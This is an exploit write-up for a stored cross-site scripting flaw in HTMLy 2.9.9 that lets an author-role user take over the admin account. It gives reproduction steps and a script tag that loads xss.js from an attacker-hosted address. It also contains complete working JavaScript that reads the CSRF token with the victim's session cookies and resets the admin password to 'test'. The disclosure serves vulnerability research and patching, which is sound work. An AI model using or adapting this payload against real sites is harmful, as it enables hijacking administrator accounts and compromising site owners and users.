# Exploit Title: Stored XSS to Account Takeover - htmlyv2.9.9
# Date: 9/2024
# Exploit Author: Andrey Stoykov
# Version: 2.9.9
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html


Description:

- It was found that the application suffers from stored XSS

- Low level user having an "author" role can takeover admin account and
change their password via posting a malicious post with a reference to a
payload hosted on attacker domain



Stored XSS to Account Takeover #1:

Steps to Reproduce:

1. Visit "My Posts" > "Add New Post" > "Regular Post"
2. Enter the following payload into the "Content" referencing externally
hosted POC in Javascript:
 <script src="http://192.168.159.191:8000/xss.js"></script>
3. Upon visiting the blog post, the admin account password would be changed
to "test"
4. In the XSS payload pasted below need to adjust the "passwordChangeUrl",
"username" and "password"


// Javascript POC

// Function to fetch CSRF token and perform password change
    (function() {
        // URL of the password change page
        const passwordChangePageUrl = '
http://192.168.159.191/htmly/edit/password';

        // Function to fetch the CSRF token
        function fetchCsrfToken() {
            fetch(passwordChangePageUrl, {
                method: 'GET',
                credentials: 'include' // Include cookies for the current
session
            })
            .then(response => response.text())
            .then(html => {
                // Parse the HTML to find the CSRF token
                const parser = new DOMParser();
                const doc = parser.parseFromString(html, 'text/html');
                const csrfTokenInput =
doc.querySelector('input[name="csrf_token"]');
                if (csrfTokenInput) {
                    const csrfToken = csrfTokenInput.value;
                    console.log('CSRF Token:', csrfToken);
                    changePassword(csrfToken);
                } else {
                    console.error('CSRF token not found');
                }
            })
            .catch(error => console.error('Error fetching CSRF token:',
error));
        }

        // Function to change the password
        function changePassword(csrfToken) {
            const postData = new URLSearchParams();
            postData.append('csrf_token', csrfToken);
            postData.append('username', 'admin');
            postData.append('password', 'test');

            fetch(passwordChangePageUrl, {
                method: 'POST',
                body: postData,
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                credentials: 'include' // Include cookies for the current
session
            })
            .then(response => response.text())
            .then(data => {
                console.log('Password change response:', data);
            })
            .catch(error => console.error('Error changing password:',
error));
        }

        // Trigger the CSRF token fetch and password change
        fetchCsrfToken();
    })();